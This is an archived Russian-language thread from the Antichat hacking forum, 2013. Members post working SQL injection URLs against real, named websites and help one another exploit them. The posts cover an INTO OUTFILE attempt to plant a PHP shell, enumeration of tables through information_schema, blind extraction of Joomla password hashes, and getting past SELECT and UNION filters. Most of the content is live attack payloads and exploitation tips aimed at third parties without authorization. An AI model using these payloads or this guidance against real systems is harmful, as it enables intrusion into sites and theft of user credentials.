ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.08.2013, 20:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от exstreme
exstreme said:
есть такое, спасибо, думал (%28) что пробел.
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test%22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO+OUTFILE+'tested.php'+--+
А это почему не срабатывает?
посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы?
Принтабельные колонки подразумевают ЧТЕНИЕ, а НЕ ВЫПОЛНЕНИЕ запрашиваемых данных.
Хотя я встречал исключения. Очень-очень-очень редко.
Максимум что тут можешь выкопать - это опять же SiXSS посредством пассивной XSS в клиентском браузере. Но это опять же, выполняется на клиенте, а не на сервере.
|
|
|

27.08.2013, 18:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 3581
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Принтабельные колонки подразумевают
ЧТЕНИЕ
, а
НЕ ВЫПОЛНЕНИЕ
запрашиваемых данных.
То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду
|
|
|
|

27.08.2013, 18:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 23349
Репутация:
45
|
|
Сообщение от exstreme
exstreme said:
То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду
У юзера бд слишком кастрированные права, файла быть не может, его и нет.
Из доступных там бд всего 2 - текущая и information_schema, так что выводить там больше нечего.
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1 union select 1,2,3,4,@a,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from(select @a:=0,(select 1 from information_schema.tables where TABLE_SCHEMA='rh_tppg' and (@a:=concat(@a,";",TABLE_NAME))))b -- w
Например вывод таблиц из текущий базы.
|
|
|
|

29.08.2013, 20:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Код:
Code:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0
http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции
P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...
|
|
|
|

29.08.2013, 20:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 900
Репутация:
0
|
|
Ребят, помогите пожалуйста советом кто разбирается в скулях. БД MySQL 5.1.
Ситуация такая:
Уперся в глухой тупик при разборе Blind SQL injection, по типу true:false. Запрос исполнился - страница загрузилась как надо; запрос неверный - страница осталась пустой. Ручками в принципе нашел все таблицы что надо - оказались обычные джумловские, версии 1.5.15.
Сама скуля оказалась в компоненте virtuemart. Сам запрос на проверку уязвимости выглядит так:
На "and" выдает ошибку (пустая страница), т.е. проходит только через "or". UNION, INSERT, UPDATE, кавычки и апострофы - в запросах также не проходят. Замена "and" или кавычек - hex кодом результата также не дает. Насчет инфы по БД, определить удалось только версию Version(), остальные функции: USER(), USER_session(), DATABASE() - определяет как ошибочные.
Все запросы на выборку делаются примерно так:
Код:
Code:
...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))>=49 limit 0,1)=1 --
и так тоже работает
...&search_category=0 or (SELECT 1 FROM jos_users WHERE substr(password,1,1)>=0х6d limit 0,1)=1 --
Т.е. можно сравнивать удачно как аскии код, так и hex код подбираемого символа. (Кэп)
В случае сравнения ASCII кодов интересно то, что сравнивать можно только по ">=" или "=". Знак меньше
Также есть доступ к php.ini. Если надо будет, могу подсмотреть какие-то параметры.
Код:
Code:
magic_quotes_gpc Off Off
safe_mode Off Off
sql.safe_mode Off Off
track_errors Off Off
display_errors Off Off
display_startup_errors Off Off
allow_url_fopen On On
allow_url_include Off Off
ЗЫ Подобные коллизиции пока в 2ух случаях нашел.
|
|
|
|

29.08.2013, 23:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Код:
Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
Всего один столбец. при вводе оператора UNION - Hacker attemp!
|
|
|
|

29.08.2013, 23:57
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Код:
Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
Всего один столбец. при вводе оператора UNION - Hacker attemp!
Сообщение от None
http://www.belavtostrada.by/show.php?category=6'and version()+like+'%5%'+--+
фильтр на select
|
|
|

30.08.2013, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 900
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Код:
Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
Всего один столбец. при вводе оператора UNION - Hacker attemp!
Не при UNION, а при SELECT
6'+and+user()+like+'belav%'--+
дальше сам бруть
|
|
|
|

30.08.2013, 10:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Код:
Code:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://krasnodar.rtrn.ru/news.asp?view=19418%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+ взгляни плз
http://www.tppkuban.ru/search.php?sovpad=1®istr=1&gogo=%E8%F1%EA%E0%F2%FC%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0
http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции
P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...
Непонятных моментов будет меньше, если разберешься с различием в раскрутке инъекций в строковыхи числовых уязвимостых параметрах:
http://www.scrutineer.ru/results.php?id= 3+order+by+8+--+
|
|
|
|

01.09.2013, 16:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR
Код:
Code:
http://ukrcrewing.com.ua/agency%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|